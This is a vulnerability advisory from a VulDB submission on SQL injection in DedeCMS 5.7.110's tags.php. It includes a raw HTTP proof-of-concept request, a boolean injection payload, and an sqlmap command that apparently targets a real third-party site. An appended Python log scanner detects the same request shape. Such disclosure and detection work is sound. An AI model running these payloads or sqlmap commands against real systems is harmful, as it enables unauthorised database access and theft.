| Title | dedecms sql injection |
|---|
| Description | Website: www.dedecms.com/
Affected version: DedeCMS V5.7.110
Vulnerability description: dedecms's tag query interface has SQL injection, using the variable $tag_alias to interpolate strings in SQL query statements,
and does not perform any filtering or escape processing on $tag_alias. This allows malicious users to inject malicious SQL code by constructing specific URL parameters.
Attackers can use this to steal sensitive information such as databases.
POC :
GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1
Host: 127.0.0.1
sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_a4980171086658b20eb2d9b523ae1b7b=1689668702,1689755217,1689908948,1690348034; Hm_lvt_f8cddee34ca21f05373a9388cfdd798b=1691473417
Connection: close
SQLmap:
sqlmap.py -u "http://list.beijingcloud.com.cn/tags.php?QUERY_STRING=alias/alias/bbb*" -dbs --batch
Payload: http://127.0.0.1:80/uploads/tags.php?QUERY_STRING=alias/alias/bbb' AND 8367=8367 AND 'yMwU'='yMwU |
|---|
| Source | ⚠️ https://github.com/laoquanshi/cve |
|---|
| User | heishou (UID 53637) |
|---|
| Submission | 2023. 08. 30. AM 04:49 (3 years ago) |
|---|
| Moderation | 2023. 09. 03. AM 09:01 (4 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 238636 [DedeCMS 5.7.110 /uploads/tags.php tag_alias SQL injection] |
|---|
| Points | 18 |
|---|
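
A defender-side check for the request shape shown in the PoC above, as an added example that is not part of the original submission or of DedeCMS: it scans web access-log lines for `tags.php` requests whose `QUERY_STRING=alias/...` value is not a plain slug. The log lines are constructed, and the slug allow-list and the choice of the last `/`-separated segment as the alias are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: a legitimate tag alias is a short slug; widen this for the site's real tags.
SAFE_ALIAS = re.compile(r"[A-Za-z0-9_-]{1,64}")
REQUEST_LINE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed access-log lines (combined log format, documentation IP ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Aug/2023:04:40:01 +0000] "GET /uploads/tags.php?QUERY_STRING=alias/alias/linux HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Aug/2023:04:41:13 +0000] "GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb%27%20AND%208367=8367%20AND%20%27yMwU%27=%27yMwU HTTP/1.1" 200 5120',
    '203.0.113.7 - - [30/Aug/2023:04:41:15 +0000] "GET /uploads/tags.php?QUERY_STRING=alias/alias/bbb* HTTP/1.1" 200 5120',
    '192.0.2.10 - - [30/Aug/2023:04:42:00 +0000] "GET /uploads/index.php?id=1 HTTP/1.1" 200 900',
]

def suspicious_alias(target):
    """Return the decoded alias if a tags.php request carries a non-slug alias, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/tags.php"):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("QUERY_STRING")
    if not values:
        return None
    # Shape taken from the PoC: QUERY_STRING=alias/alias/<value>.
    # Only this alias form is inspected; other QUERY_STRING forms are out of scope here.
    segments = values[0].split("/")
    if segments[0] != "alias":
        return None
    alias = segments[-1]
    return None if SAFE_ALIAS.fullmatch(alias) else alias

def scan(log_lines):
    """Return (line_number, decoded_alias) for every flagged request."""
    hits = []
    for number, line in enumerate(log_lines, 1):
        match = REQUEST_LINE.search(line)
        if match:
            alias = suspicious_alias(match.group(1))
            if alias is not None:
                hits.append((number, alias))
    return hits

if __name__ == "__main__":
    for number, alias in scan(SAMPLE_LOG):
        print(f"line {number}: suspicious tag alias {alias!r}")
```

The same allow-list can be enforced in front of the application as input validation, but it does not replace escaping or parameterizing the alias in the query itself.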